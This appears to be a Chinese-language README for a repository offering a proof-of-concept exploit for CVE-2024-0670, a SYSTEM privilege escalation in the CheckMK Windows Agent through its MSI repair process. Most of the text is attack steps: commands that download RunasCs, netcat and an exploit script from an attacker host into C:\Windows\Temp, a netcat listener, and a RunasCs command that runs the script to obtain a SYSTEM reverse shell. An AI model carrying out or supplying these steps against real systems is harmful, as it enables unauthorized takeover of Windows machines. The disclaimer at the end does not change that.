此仓库包含针对CVE-2024-0670的漏洞利用演示,该漏洞是影响CheckMK Agent for Windows的本地权限提升漏洞。该漏洞允许低权限用户通过滥用MSI修复机制处理的可写文件路径获取SYSTEM权限。
本仓库包含 CVE-2024-0670 的一个简洁清晰的验证概念(PoC),该漏洞是 CheckMK Windows Agent 中的一个本地权限提升漏洞。 低权限用户可以通过滥用 MSI 修复过程中执行的可写临时文件路径来获取 SYSTEM 权限。
在 MSI 修复期间,CheckMK 会在以下路径执行文件:
C:\Windows\Temp\
如果普通用户能够将可预测名称的文件放置在该路径下,就能以 NT AUTHORITY\SYSTEM 身份执行命令。
该漏洞利用会植入多个载荷文件名,并触发 MSI 修复以实现 SYSTEM 执行。
RunasCs.exe → runas 替代工具(支持明文密码)
nc.exe → Netcat(反向 Shell)
exploit.ps1 → CVE-2024-0670 漏洞利用脚本
README.md → 文档
C:\Windows\Temp\
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1
在攻击机上启动监听器:
nc -lvnp 1111
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"
如果成功,你将收到一个 SYSTEM 反向 Shell。
net4:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs
net2:
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs
本项目仅用于教育和授权的渗透测试。 请勿将其用于非法目的。 作者不对滥用行为负责。